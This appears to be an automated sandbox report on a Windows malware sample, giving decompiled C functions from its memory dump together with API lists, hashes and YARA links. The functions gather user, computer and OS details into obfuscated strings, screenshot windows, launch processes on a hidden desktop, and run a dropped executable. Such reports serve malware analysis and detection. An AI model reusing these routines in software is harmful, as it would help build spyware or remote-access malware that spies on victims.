								_t212 = _t212 + 4;
								if(_v706 != 0) {
									continue;
								} else {
									goto L6;
								}
							}
						}
						L8:
						if(_t157 != 0) {
							_t213 =  &_v272;
							_t240 = _t213 + 2;
							do {
								_t158 =  *_t213;
								_t213 = _t213 + 2;
								__eflags = _t158 - _v704;
							} while (_t158 != _v704);
							_v720 = (_t213 - _t240 >> 1) + 1;
							_t161 = E00B56F1C(4 + ((_t213 - _t240 >> 1) + 1) * 2);
							_v732 = _t161;
							__eflags = _t161;
							if(_t161 == 0) {
								goto L39;
							} else {
								_v728 =  *((intOrPtr*)(_t251 + _t243));
								_v740 =  *(_t243 + 0xa0 + _t204 * 4);
								_v744 =  *(_t243 + 8);
								_v708 = _t161 + 4;
								_t163 = E00B5604D(_t161 + 4, _v720,  &_v272);
								_t265 = _t263 + 0xc;
								__eflags = _t163;
								if(_t163 != 0) {
									_t164 = _v704;
									_push(_t164);
									_push(_t164);
									_push(_t164);
									_push(_t164);
									_push(_t164);
									E00B52919();
									asm("int3");
									_t166 =  *0xb6a53c; // 0x0
									return _t166;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t251 + _t243)) = _v708;
									if(_v272 != 0x43) {
										L17:
										_t169 = E00B53B10(_t204, _t243,  &_v700);
										_t222 = _v704;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L17;
										} else {
											_t222 = _v704;
											_t169 = _t222;
										}
									}
									 *(_t243 + 0xa0 + _t204 * 4) = _t169;
									__eflags = _t204 - 2;
									if(_t204 != 2) {
										__eflags = _t204 - 1;
										if(_t204 != 1) {
											__eflags = _t204 - 5;
											if(_t204 == 5) {
												 *((intOrPtr*)(_t243 + 0x14)) = _v712;
											}
										} else {
											 *((intOrPtr*)(_t243 + 0x10)) = _v712;
										}
									} else {
										_t255 = _v724;
										_t241 = _t222;
										_t232 = _t255;
										 *(_t243 + 8) = _v712;
										_v708 = _t255;
										_v720 = _t255[8];
										_v712 = _t255[9];
										while(1) {
											__eflags =  *(_t243 + 8) -  *_t232;
											if( *(_t243 + 8) ==  *_t232) {
												break;
											}
											_t256 = _v708;
											_t241 = _t241 + 1;
											_t201 =  *_t232;
											 *_t256 = _v720;
											_v712 = _t232[1];
											_t232 = _t256 + 8;
											 *((intOrPtr*)(_t256 + 4)) = _v712;
											_t204 = _v736;
											_t255 = _v724;
											_v720 = _t201;
											_v708 = _t232;
											__eflags = _t241 - 5;
											if(_t241 < 5) {
												continue;
											} else {
											}
											L25:
											__eflags = _t241 - 5;
											if(__eflags == 0) {
												_t192 = E00B5BFC9(_t204, _t243, _t255, __eflags, _v704, 1, 0xb34cd8, 0x7f,  &_v528,  *(_t243 + 8), 1);
												_t265 = _t265 + 0x1c;
												__eflags = _t192;
												if(_t192 == 0) {
													_t233 = _v704;
												} else {
													_t194 = _v704;
													do {
														 *(_t259 + _t194 * 2 - 0x20c) =  *(_t259 + _t194 * 2 - 0x20c) & 0x000001ff;
														_t194 = _t194 + 1;
														__eflags = _t194 - 0x7f;
													} while (_t194 < 0x7f);
													_t196 = E00B4E36D( &_v528,  *0xb690a0, 0xfe);
													_t265 = _t265 + 0xc;
													__eflags = _t196;
													_t233 = 0 | _t196 == 0x00000000;
												}
												_t255[1] = _t233;
												 *_t255 =  *(_t243 + 8);
											}
											 *(_t243 + 0x18) = _t255[1];
											goto L37;
										}
										__eflags = _t241;
										if(_t241 != 0) {
											 *_t255 =  *(_t255 + _t241 * 8);
											_t255[1] =  *(_t255 + 4 + _t241 * 8);
											 *(_t255 + _t241 * 8) = _v720;
											 *(_t255 + 4 + _t241 * 8) = _v712;
										}
										goto L25;
									}
									L37:
									_t170 = _t204 * 0xc;
									_t106 = _t170 + 0xb34d60; // 0xb469c7
									 *0xb672b4(_t243);
									_t172 =  *((intOrPtr*)( *_t106))();
									_t225 = _v728;
									__eflags = _t172;
									if(_t172 == 0) {
										__eflags = _t225 - 0xb693d8;
										if(_t225 != 0xb693d8) {
											_t254 = _t204 + _t204;
											__eflags = _t254;
											asm("lock xadd [eax], ecx");
											if(_t254 != 0) {
												goto L44;
											} else {
												E00B564B8( *((intOrPtr*)(_t243 + 0x28 + _t254 * 8)));
												E00B564B8( *((intOrPtr*)(_t243 + 0x24 + _t254 * 8)));
												E00B564B8( *(_t243 + 0xa0 + _t204 * 4));
												_t228 = _v704;
												 *(_v716 + _t243) = _t228;
												 *(_t243 + 0xa0 + _t204 * 4) = _t228;
											}
										}
										_t226 = _v732;
										 *_t226 = 1;
										 *((intOrPtr*)(_t243 + 0x28 + (_t204 + _t204) * 8)) = _t226;
									} else {
										 *((intOrPtr*)(_v716 + _t243)) = _t225;
										E00B564B8( *(_t243 + 0xa0 + _t204 * 4));
										 *(_t243 + 0xa0 + _t204 * 4) = _v740;
										E00B564B8(_v732);
										 *(_t243 + 8) = _v744;
										goto L39;
									}
									goto L40;
								}
							}
						} else {
							L40:
							return E00B4AE43(_v8 ^ _t259);
						}
						goto L48;
					}
					asm("sbb eax, eax");
					_t157 = _t156 | 0x00000001;
					__eflags = _t157;
					goto L8;
				}
				L48:
			}

APIs

Part of subcall function 00B5830D: GetLastError.KERNEL32(80(,$,00000000,00000000,00B52F3C,?,00B4AB3B,80(,$,00B3DA3C,00000000,?,?,00B49006,00000000,00B3DA3C,00B3DA3C), ref: 00B58312
Part of subcall function 00B5830D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,00B4AB3B,80(,$,00B3DA3C,00000000,?,?,00B49006,00000000,00B3DA3C,00B3DA3C), ref: 00B583B0

_memcmp.LIBVCRUNTIME ref: 00B549C9
_free.LIBCMT ref: 00B54A3D
_free.LIBCMT ref: 00B54A56
_free.LIBCMT ref: 00B54A96
_free.LIBCMT ref: 00B54A9F
_free.LIBCMT ref: 00B54AAB

Strings

C, xrefs: 00B5488C

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast$_memcmp
String ID: C
API String ID: 4275183328-1037565863
Opcode ID: 4cca683aa41cbab14b4c9b8e2d5069a683c56073ac91f53c32306b9e7d544c49
Instruction ID: fa104f1072fdf4c64d425f1aef303d7c42c2c14784e46ede7e42649deaa89e9e
Opcode Fuzzy Hash: 4cca683aa41cbab14b4c9b8e2d5069a683c56073ac91f53c32306b9e7d544c49
Instruction Fuzzy Hash: D8B12875A012199FDB24DF18C885BAEB7F4FB48309F5045EAE909A7350D771AE94CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00B48E00, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00B48E00(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t43;
				signed int _t51;
				void* _t88;
				void* _t89;
				void* _t97;
				void* _t101;
				void* _t103;
				signed int _t106;
				void* _t107;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;

				_t94 = __edi;
				_t43 =  *0xb69014; // 0xce6f0fb5
				 *(_t106 + 0x604) = _t43 ^ _t106;
				E00B4D0F0(__edi, _t106 + 0xf8, 0, 0x104);
				_t107 = _t106 + 0xc;
				E00B4D0F0(_t94, _t107 + 0x200, 0, 0x208);
				_t108 = _t107 + 0xc;
				E00B4D0F0(_t94, _t108 + 0x408, 0, 0x208);
				_t109 = _t108 + 0xc;
				 *(_t109 + 0x10) = 0x104;
				_t51 = 9;
				memset(_t109 + 0x14, 0, _t51 << 2);
				_t110 = _t109 + 0xc;
				E00B4D0F0(_t109 + 0x14 + _t51, _t110 + 0x60, 0, 0x9c);
				_t111 = _t110 + 0xc;
				GetUserNameW(_t111 + 0x204, _t111 + 0x10);
				 *(_t111 + 0x10) = 0x104;
				GetComputerNameW(_t111 + 0x40c, _t111 + 0x10);
				_t101 = E00B4ABA3(_t111 + 0x200);
				_t97 = E00B4ABA3(_t111 + 0x408);
				 *0xb6ac44(_t111 + 0x14, __edi, __esi, _t103, __ebx);
				 *(_t111 + 0x58) = 0x9c;
				GetVersionExA(_t111 + 0x58);
				asm("movaps xmm0, [0xb3dd10]");
				_t88 = 0;
				asm("movups [esp+0x38], xmm0");
				 *((intOrPtr*)(_t111 + 0x48)) = 0x2f21742c;
				 *((intOrPtr*)(_t111 + 0x4c)) = 0x722a2671;
				 *(_t111 + 0x50) = 0x3f7f253c;
				 *((char*)(_t111 + 0x54)) = 0;
				do {
					_t24 = _t88 + 0x40; // 0x40
					 *(_t111 + _t88 + 0x38) =  *(_t111 + _t88 + 0x38) ^ _t24;
					_t88 = _t88 + 1;
				} while (_t88 < 0x1c);
				_t89 = 9;
				 *((char*)(_t111 + 0x54)) = 0;
				wsprintfA(_t111 + 0x118, _t111 + 0x50,  *((intOrPtr*)(_t111 + 0x74)),  *((intOrPtr*)(_t111 + 0x74)),  *(_t111 + 0xfc) & 0x0000ffff, 0 |  *((char*)(_t111 + 0xf6)) != 0x00000001, _t97, _t101, 0 |  *((intOrPtr*)(_t111 + 0x14)) == _t89);
				_t112 = _t111 + 0x24;
				E00B50985(E00B497E3(0x9c, _t111 + 0x11c, _t97, _t101, 0x104));
				return E00B4AE43( *(_t111 + 0x638) ^ _t112);
			}

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00B48E8A
GetComputerNameW.KERNEL32 ref: 00B48EA1

Part of subcall function 00B4ABA3: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000208,0000009C,00B48EB3), ref: 00B4ABB7
Part of subcall function 00B4ABA3: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00B4ABE2

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B48EC8
GetVersionExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B48ED7
wsprintfA.USER32 ref: 00B48F56

Strings

,t!/, xrefs: 00B48EEB
q&*r, xrefs: 00B48EF3

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiNameWide$ComputerInfoNativeSystemUserVersionwsprintf
String ID: ,t!/$q&*r
API String ID: 1366013575-1065670639
Opcode ID: 5244b67fa33310c00b0e6fc501c352a515371abb15600b7e64fce49101df5916
Instruction ID: 49b77e1b4b5fc52ba7f0e9ef9ba32f035dcea3e6528ba1a0e44dc698764154a5
Opcode Fuzzy Hash: 5244b67fa33310c00b0e6fc501c352a515371abb15600b7e64fce49101df5916
Instruction Fuzzy Hash: BC4150B24083859BD720DF60EC85BABBBECEF84354F10092DF689C3151EB7596499B62

Uniqueness

Uniqueness Score: -1.00%

Function 00B442A8, Relevance: 12.1, APIs: 8, Instructions: 67
windowCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00B442A8(void* __ebx, struct HWND__* __ecx, struct HDC__* __edx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4) {
				signed int _v4;
				struct tagRECT _v20;
				void* _v24;
				intOrPtr _v44;
				signed int _v48;
				int _v52;
				int _v56;
				struct HDC__* _v60;
				signed int _t17;
				void* _t28;
				struct HWND__* _t45;
				struct HDC__* _t47;
				void* _t48;
				struct HDC__* _t50;

				_t51 =  &_v24;
				_t17 =  *0xb69014; // 0xce6f0fb5
				_v4 = _t17 ^  &_v24;
				_v24 = _a4;
				_t45 = __ecx;
				_t47 = __edx;
				GetWindowRect(__ecx,  &_v20);
				_t50 = CreateCompatibleDC(_t47);
				_t48 = CreateCompatibleBitmap(_t47, _v20.top - _v24, _v20.right - _v20.left);
				_t28 = SelectObject(_t50, _t48);
				__imp__PrintWindow(_t45, _t50, 0);
				if(_t28 != 0) {
					BitBlt(_v60, _v56, _v52, _v48 - _v56, _v44 - _v52, _t50, 0, 0, 0xcc0020);
				}
				DeleteObject(_t48);
				DeleteDC(_t50);
				return E00B4AE43(_v48 ^ _t51);
			}

0x00b442a8
0x00b442ab
0x00b442b2
0x00b442be
0x00b442c2
0x00b442c8
0x00b442ce
0x00b442db
0x00b442f6
0x00b442fa
0x00b44303
0x00b4430b
0x00b44333
0x00b44339
0x00b4433b
0x00b44342
0x00b4435c

APIs

GetWindowRect.USER32 ref: 00B442CE
CreateCompatibleDC.GDI32 ref: 00B442D5
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00B442F0
SelectObject.GDI32(00000000,00000000), ref: 00B442FA
PrintWindow.USER32(?,00000000,00000000,?,?,?,?,?,?,?,?,00B443B5,?), ref: 00B44303
BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00CC0020), ref: 00B44333
DeleteObject.GDI32(00000000), ref: 00B4433B
DeleteDC.GDI32(00000000), ref: 00B44342

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: CompatibleCreateDeleteObjectWindow$BitmapPrintRectSelect
String ID:
API String ID: 2993826089-0
Opcode ID: 900fa5d4ecd8dd141943131a7416e4ca1b78db14208164ecaaf345f2dcb444b7
Instruction ID: c12e46b05e6a06514c8d6ccb915c0d5f6ba62856fba6076a017a772be475e387
Opcode Fuzzy Hash: 900fa5d4ecd8dd141943131a7416e4ca1b78db14208164ecaaf345f2dcb444b7
Instruction Fuzzy Hash: BD110A72158205AF9341EF68DD88D6FBBECFB89258F40095DF585D3250CF68D9058BB2

Uniqueness

Uniqueness Score: -1.00%

Function 00B4CAC0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00B4CAC0(void* __ebx, void* __esi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr* _v40;
				char _t58;
				signed int _t65;
				intOrPtr _t66;
				void* _t67;
				intOrPtr* _t68;
				intOrPtr _t70;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr _t82;
				intOrPtr _t84;
				signed int _t88;
				char _t90;
				intOrPtr* _t94;
				intOrPtr* _t95;
				intOrPtr _t99;
				void* _t106;
				intOrPtr _t109;
				intOrPtr* _t111;
				intOrPtr _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				void* _t121;
				void* _t122;
				void* _t130;

				_t82 = _a8;
				_v5 = 0;
				_t114 = _t82 + 0x10;
				_push(_t114);
				_v16 = 1;
				_v20 = _t114;
				_v12 =  *(_t82 + 8) ^  *0xb69014;
				E00B4CA80( *(_t82 + 8) ^  *0xb69014);
				E00B4F487(_a12);
				_t58 = _a4;
				_t122 = _t121 + 0xc;
				_t109 =  *((intOrPtr*)(_t82 + 0xc));
				if(( *(_t58 + 4) & 0x00000066) != 0) {
					__eflags = _t109 - 0xfffffffe;
					if(_t109 != 0xfffffffe) {
						E00B4F470(_t82, 0xfffffffe, _t114, 0xb69014);
						goto L14;
					}
					goto L15;
				} else {
					_v32 = _t58;
					_v28 = _a12;
					 *((intOrPtr*)(_t82 - 4)) =  &_v32;
					if(_t109 == 0xfffffffe) {
						L15:
						return _v16;
					} else {
						do {
							_t88 = _v12;
							_t20 = _t109 + 2; // 0x3
							_t65 = _t109 + _t20 * 2;
							_t84 =  *((intOrPtr*)(_t88 + _t65 * 4));
							_t66 = _t88 + _t65 * 4;
							_t89 =  *((intOrPtr*)(_t66 + 4));
							_v24 = _t66;
							if( *((intOrPtr*)(_t66 + 4)) == 0) {
								_t90 = _v5;
								goto L8;
							} else {
								_t67 = E00B4F420(_t89, _t114);
								_t90 = 1;
								_v5 = 1;
								_t130 = _t67;
								if(_t130 < 0) {
									_v16 = 0;
									L14:
									_push(_t114);
									E00B4CA80(_v12);
									goto L15;
								} else {
									if(_t130 > 0) {
										_t68 = _a4;
										__eflags =  *_t68 - 0xe06d7363;
										if( *_t68 == 0xe06d7363) {
											__eflags =  *0xb34370;
											if(__eflags != 0) {
												_t78 = E00B64D30(__eflags, 0xb34370);
												_t122 = _t122 + 4;
												__eflags = _t78;
												if(_t78 != 0) {
													_t118 =  *0xb34370; // 0xb4e178
													 *0xb672b4(_a4, 1);
													 *_t118();
													_t114 = _v20;
													_t122 = _t122 + 8;
												}
												_t68 = _a4;
											}
										}
										E00B4F454(_t68, _a8, _t68);
										_t70 = _a8;
										__eflags =  *((intOrPtr*)(_t70 + 0xc)) - _t109;
										if( *((intOrPtr*)(_t70 + 0xc)) != _t109) {
											E00B4F470(_t70, _t109, _t114, 0xb69014);
											_t70 = _a8;
										}
										_push(_t114);
										 *((intOrPtr*)(_t70 + 0xc)) = _t84;
										E00B4CA80(_v12);
										E00B4F438();
										asm("int3");
										_push(_t109);
										_t111 = _v40;
										__eflags =  *((char*)(_t111 + 4));
										if( *((char*)(_t111 + 4)) == 0) {
											L31:
											_t94 = _a4;
											_t72 =  *_t111;
											 *_t94 = _t72;
											 *((char*)(_t94 + 4)) = 0;
										} else {
											_t95 =  *_t111;
											__eflags = _t95;
											if(_t95 == 0) {
												goto L31;
											} else {
												_t106 = _t95 + 1;
												do {
													_t73 =  *_t95;
													_t95 = _t95 + 1;
													__eflags = _t73;
												} while (_t73 != 0);
												_push(_t84);
												_push(_t114);
												_t85 = _t95 - _t106 + 1;
												_push(_t95 - _t106 + 1);
												_t116 = E00B509A2();
												__eflags = _t116;
												if(_t116 != 0) {
													E00B56383(_t116, _t85,  *_t111);
													_t76 = _a4;
													_t99 = _t116;
													_t116 = 0;
													__eflags = 0;
													 *_t76 = _t99;
													 *((char*)(_t76 + 4)) = 1;
												}
												_t72 = E00B50985(_t116);
											}
										}
										return _t72;
									} else {
										goto L8;
									}
								}
							}
							goto L33;
							L8:
							_t109 = _t84;
						} while (_t84 != 0xfffffffe);
						if(_t90 != 0) {
							goto L14;
						}
						goto L15;
					}
				}
				L33:
			}

APIs

_ValidateLocalCookies.LIBCMT ref: 00B4CAEB
___except_validate_context_record.LIBVCRUNTIME ref: 00B4CAF3
_ValidateLocalCookies.LIBCMT ref: 00B4CB81
__IsNonwritableInCurrentImage.LIBCMT ref: 00B4CBAC
_ValidateLocalCookies.LIBCMT ref: 00B4CC01

Strings

csm, xrefs: 00B4CB96

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: bf822cc15369b8dd0931a291cbef86222044b84ae5eca852f554f8b6644dde8f
Instruction ID: e348d12dbf0859ffc891c2815bd541491ebf208a787c15dabb0d6b7ffa7ac6ee
Opcode Fuzzy Hash: bf822cc15369b8dd0931a291cbef86222044b84ae5eca852f554f8b6644dde8f
Instruction Fuzzy Hash: 9D41A134A0120DABCF10DF68C885AAEBFF4EF45728F1481E5E8155B392DB359B01DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B45A71, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 93
processthreadCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00B45A71(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v10;
				short _v12;
				struct _PROCESS_INFORMATION _v28;
				struct _STARTUPINFOA _v100;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v156;
				CHAR* _v160;
				struct _PROCESS_INFORMATION* _v176;
				struct HINSTANCE__* _v180;
				struct tagOFNA _v188;
				signed int _t28;
				CHAR* _t31;
				struct HINSTANCE__* _t34;
				CHAR* _t51;
				struct tagOFNA _t56;
				long _t58;
				CHAR* _t61;
				signed int _t63;
				signed int _t65;
				signed int _t66;

				_t65 = (_t63 & 0xfffffff8) - 0xbc;
				_t28 =  *0xb69014; // 0xce6f0fb5
				_v8 = _t28 ^ _t65;
				SetThreadDesktop( *0xb6ae3c);
				_push(0x105);
				_t31 = E00B509A2();
				_t56 = 0x58;
				_t61 = _t31;
				E00B4D0F0(_t56,  &_v188, 0, _t56);
				_t66 = _t65 + 0x10;
				_v188 = _t56;
				_t34 = GetModuleHandleA(0);
				asm("movaps xmm0, [0xb3de40]");
				_t51 = 0;
				_v180 = _t34;
				asm("movups [esp+0xb0], xmm0");
				_v12 = 0x50;
				do {
					_t6 = _t51 + 0x40; // 0x40
					 *(_t66 + _t51 + 0xb0) =  *(_t66 + _t51 + 0xb0) ^ _t6;
					_t51 = _t51 + 1;
				} while (_t51 < 0x11);
				asm("movaps xmm0, [0xb3de10]");
				_v176 =  &_v28;
				_v160 = _t61;
				_v156 = 0x104;
				asm("movups [esp+0xb0], xmm0");
				_v12 = 0x3f25;
				_v10 = 0;
				_v140 = E00B427A4( &_v28);
				_v136 = 0x1000;
				if(GetOpenFileNameA( &_v188) != 0) {
					_t58 = 0x44;
					E00B4D0F0(_t58,  &_v100, 0, _t58);
					_v100.cb = _t58;
					_v100.lpDesktop = 0xb699c0;
					asm("stosd");
					_t66 = _t66 + 0xc;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					CreateProcessA(_t61, 0, 0, 0, 0, 0, 0, 0,  &_v100,  &_v28);
				}
				return E00B4AE43(_v8 ^ _t66);
			}

APIs

SetThreadDesktop.USER32 ref: 00B45A94
GetModuleHandleA.KERNEL32(00000000), ref: 00B45ABF
GetOpenFileNameA.COMDLG32(?), ref: 00B45B48
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00B45B92

Strings

Tett, xrefs: 00B45B6E
%?, xrefs: 00B45B21

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDesktopFileHandleModuleNameOpenProcessThread
String ID: %?$Tett
API String ID: 633583800-3620498704
Opcode ID: e9e30beb2ced274fc71f1b6ab367d9a7414f8a645bdb54776d2b7b96852c3ee4
Instruction ID: 7e8d98812590f1cb531091cc388b8539e726b34cd9be216709fd4f7a3f44e849
Opcode Fuzzy Hash: e9e30beb2ced274fc71f1b6ab367d9a7414f8a645bdb54776d2b7b96852c3ee4
Instruction Fuzzy Hash: 54315C725087849BE320DF68D845B9BBBE9FF98304F000A2EE69487161EB709548CB53

Uniqueness

Uniqueness Score: -1.00%

Function 00B48CE5, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 89
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00B48CE5(void* __ebx, void* __ecx, char* __edx, void* __edi, void* __esi) {
				signed int _v8;
				char _v12;
				short _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				void* __ebp;
				signed int _t23;
				char* _t26;
				char* _t30;
				char* _t33;
				signed int _t56;
				void* _t59;

				_t43 = __ecx;
				_t23 =  *0xb69014; // 0xce6f0fb5
				_v8 = _t23 ^ _t56;
				_t55 = __edx;
				_t59 = __ecx;
				if(_t59 == 0) {
					_t26 = E00B489B2(__ebx, __edx, __edi, __edx, _t56, __edx,  &_v32);
					if(_v32 > 0x400 &&  *_t26 == 0x4d &&  *((char*)(_t26 + 1)) == 0x5a) {
						_v24 = 0x271e7b03;
						_v20 = 0x3f236b28;
						_v16 = 0x2d;
						E00B48B64(E00B42D10( &_v24), _t26, _v32);
						_v24 = 0x271e7b03;
						_v20 = 0x3f236b28;
						_v16 = 0x2d;
						_v32 = 0x2d27312f;
						_v28 = 0;
						_t30 = E00B42D10( &_v24);
						_t21 =  &_v32; // 0x2d27312f
						ShellExecuteA(0, E00B432BE(_t21), _t30, 0, 0, 0);
					}
				} else {
					if(_t59 > 0) {
						if(__ecx <= 2) {
							_t33 = StrChrA(__edx, 0x3a);
							if(_t33 != 0) {
								 *_t33 = 0;
								E00B46268(_t55, E00B525D7(_t43,  &(_t33[1]), 0, 0xa));
							}
						} else {
							if(__ecx == 4) {
								_v24 = 0x6160007;
								_v20 = 0x1403081b;
								_v16 = 0xe0d081b;
								_v12 = 0;
								MessageBoxA(0, _t55, E00B42810( &_v24), 0);
							}
						}
					}
				}
				return E00B4AE43(_v8 ^ _t56);
			}

APIs

MessageBoxA.USER32 ref: 00B48D37
StrChrA.SHLWAPI(0000000A,0000003A,00000000,?,?,?,?,?,?,?,00B4902F), ref: 00B48D45
ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B48DEC

Strings

-, xrefs: 00B48DCC
/1'-, xrefs: 00B48DE2
(k#?, xrefs: 00B48DC5

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ExecuteMessageShell
String ID: (k#?$-$/1'-
API String ID: 649218774-1865253682
Opcode ID: 86adf5704f813f04275bc769ba546970f612e9106f338b5f7aecc57f8ace4ed7
Instruction ID: 1998e1c425329f2861ae63c692fefbb3e2e4c8fae4b65d813b61af8edacb3e0c
Opcode Fuzzy Hash: 86adf5704f813f04275bc769ba546970f612e9106f338b5f7aecc57f8ace4ed7
Instruction Fuzzy Hash: 00316FB0D02219AAEB15AFA48895ABF7BECEF11304F1044ADE51277181DE784F05AB66

Uniqueness

Uniqueness Score: -1.00%

Function 00B5D89C, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B5D89C(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0xb6a8e8 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0xb36b48 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E00B563DD(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E00B563DD(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

Strings

api-ms-, xrefs: 00B5D8F3
ext-ms-, xrefs: 00B5D907

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 53bf7508d7b07ad1f9dcb9ed2ab1349a8b5af6a17fdc49fdd59d2b52f2b1547a
